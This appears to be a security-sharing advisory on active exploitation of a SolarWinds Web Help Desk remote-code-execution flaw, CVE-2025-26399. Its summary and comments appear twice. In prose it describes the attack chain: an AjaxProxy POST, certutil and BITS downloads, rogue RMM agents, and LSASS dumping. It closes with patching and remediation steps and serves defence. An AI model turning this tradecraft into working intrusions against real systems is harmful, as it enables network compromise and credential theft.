Active Exploitation of SolarWinds Web Help Desk
Summary:
In early February 2026, a coordinated disclosure from Microsoft and Huntress alerted the security community to the active exploitation of CVE-2025-26399 (CVSS 9.8), a critical unauthenticated remote code execution (RCE) vulnerability in SolarWinds Web Help Desk (WHD). Microsoft’s investigation reveals that this flaw is being leveraged by a sophisticated set of threat actors to bypass previous security patches (CVE-2024-28988 and CVE-2024-28986). The exploitation is characterized by its speed; once a server is compromised, attackers move rapidly to gain persistence and conduct internal reconnaissance. Threat actors have been observed deploying a "Swiss Army Knife" of tools, including Cloudflare tunnels for stealthy command-and-control (C2), unauthorized remote management software, and credential-harvesting scripts, all aimed at pivoting from the help desk server into the broader corporate environment.
The technical attack chain typically begins with a malicious POST request to the AjaxProxy endpoint, which allows the attacker to execute arbitrary commands under the SYSTEM context. Following initial access, Microsoft observed actors utilizing Windows Background Intelligent Transfer Service (BITS) and certutil.exe to download secondary payloads, such as the Zoho ManageEngine RMM agent and Velociraptor. In some instances, attackers further obfuscated their activity by deploying QEMU virtual machines to host their C2 infrastructure or using DLL sideloading via wab.exe to dump LSASS memory. This activity coincides with the discovery of several other critical flaws in WHD (including CVE-2025-40551), which CISA recently added to its Known Exploited Vulnerabilities (KEV) catalog, signaling a widespread and sustained effort by threat actors to weaponize this platform.
Security Officer Comments:
The Microsoft data adds a layer of concern regarding the "living-off-the-land" (LotL) nature of this campaign. Attackers are not just using malware; they are abusing legitimate binaries like certutil.exe to download payloads and msiexec.exe to install unauthorized RMM tools such as Zoho Assist. This is particularly dangerous for our members who manage large, complex networks where these tools might already exist for legitimate IT support, making the malicious activity blend in with daily operations. Microsoft’s observation that attackers are targeting Active Directory (AD) immediately after gaining access suggests that the ultimate goal is full network takeover. For an IT-ISAC member, this means a single unpatched WHD instance could serve as the "patient zero" for a ransomware deployment or a massive data breach. The speed of movement, often occurring within hours of initial access, means that reactive security is insufficient; proactive hunting for these specific indicators is required.
Suggested Corrections:
Link(s):
https://www.huntress.com/blog/active-exploitation-solarwinds-web-help-desk-cve-2025-26399
In early February 2026, a coordinated disclosure from Microsoft and Huntress alerted the security community to the active exploitation of CVE-2025-26399 (CVSS 9.8), a critical unauthenticated remote code execution (RCE) vulnerability in SolarWinds Web Help Desk (WHD). Microsoft’s investigation reveals that this flaw is being leveraged by a sophisticated set of threat actors to bypass previous security patches (CVE-2024-28988 and CVE-2024-28986). The exploitation is characterized by its speed; once a server is compromised, attackers move rapidly to gain persistence and conduct internal reconnaissance. Threat actors have been observed deploying a "Swiss Army Knife" of tools, including Cloudflare tunnels for stealthy command-and-control (C2), unauthorized remote management software, and credential-harvesting scripts, all aimed at pivoting from the help desk server into the broader corporate environment.
The technical attack chain typically begins with a malicious POST request to the AjaxProxy endpoint, which allows the attacker to execute arbitrary commands under the SYSTEM context. Following initial access, Microsoft observed actors utilizing Windows Background Intelligent Transfer Service (BITS) and certutil.exe to download secondary payloads, such as the Zoho ManageEngine RMM agent and Velociraptor. In some instances, attackers further obfuscated their activity by deploying QEMU virtual machines to host their C2 infrastructure or using DLL sideloading via wab.exe to dump LSASS memory. This activity coincides with the discovery of several other critical flaws in WHD (including CVE-2025-40551), which CISA recently added to its Known Exploited Vulnerabilities (KEV) catalog, signaling a widespread and sustained effort by threat actors to weaponize this platform.
Security Officer Comments:
The Microsoft data adds a layer of concern regarding the "living-off-the-land" (LotL) nature of this campaign. Attackers are not just using malware; they are abusing legitimate binaries like certutil.exe to download payloads and msiexec.exe to install unauthorized RMM tools such as Zoho Assist. This is particularly dangerous for our members who manage large, complex networks where these tools might already exist for legitimate IT support, making the malicious activity blend in with daily operations. Microsoft’s observation that attackers are targeting Active Directory (AD) immediately after gaining access suggests that the ultimate goal is full network takeover. For an IT-ISAC member, this means a single unpatched WHD instance could serve as the "patient zero" for a ransomware deployment or a massive data breach. The speed of movement, often occurring within hours of initial access, means that reactive security is insufficient; proactive hunting for these specific indicators is required.
Suggested Corrections:
- Patch and restrict exposure now. Update WHD CVE-2025-40551, CVE-2025-40536 and CVE-2025-26399, remove public access to admin paths, and increase logging on Ajax Proxy.
- Evict unauthorized RMM. Find and remove ManageEngine RMM artifacts (for example, ToolsIQ.exe) added after exploitation.
- Reset and isolate. Rotate credentials (start with service and admin accounts reachable from WHD), and isolate compromised hosts.
Link(s):
https://www.huntress.com/blog/active-exploitation-solarwinds-web-help-desk-cve-2025-26399